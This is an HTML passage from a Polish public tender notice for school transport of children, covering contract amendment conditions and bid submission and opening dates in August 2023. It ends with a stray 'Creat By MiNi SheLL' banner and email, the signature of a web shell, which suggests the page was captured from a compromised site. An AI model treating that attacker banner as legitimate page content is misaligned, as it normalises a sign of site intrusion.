posiadającą uprawnienia kierowcy adekwatne do prowadzenia<br/>oferowanych samochodów, spełniających minimalne wymagania Zamawiającego. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający oświadcza, iż przewiduje możliwość zmian Umowy w przypadku wystąpienia okoliczności, których nie<br/>można było przewidzieć w chwili zawarcia umowy w zakresie przedmiotu umowy dotyczącą jednej z wymienionych poniżej<br/>okoliczności:<br/>1) zmiany ilości dowożonych dzieci (zwiększenie lub zmniejszenia, maksymalnie o 3),<br/>2) zmiany adresu zamieszkania ucznia (dotyczy zmiany adresu zamieszkania w trakcie roku szkolnego); zmiana ta może<br/>skutkować zmianą ilości przejechanych kilometrów w miesiącu oraz zmianą trasy dowozu.<br/>3) zmiany ilości dowożonych dzieci w przypadku zwiększenie lub zmniejszenia powyżej 3 osoby,<br/>2. Zmiany postanowień umowy, o których mowa w ust. 1 pkt 1 i 2 nie spowodują zmian wynagrodzenia za jeden kurs, o<br/>którym mowa w § 4 ust. 2.<br/>3. Zmiany postanowień umowy, o których mowa w ust. 1 pkt 3 powodują zmianę wynagrodzenia za jeden kurs, o którym<br/>mowa w § 4 ust. 2, w ten sposób, że stawkę za jeden dzień przewozu dzieli się przez liczbę przewożonych dzieci i o te<br/>kwotę pomniejsza się lub powiększa wynagrodzenie o którym mowa w § 4 ust. 2.<br/>4. Zmiana postanowień zawartej umowy może nastąpić wyłącznie za zgodą obu stron wyrażoną na piśmie pod rygorem<br/>nieważności <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-08-11 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Platformy Zakupowej pod adresem:</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-08-11 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-09-09</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com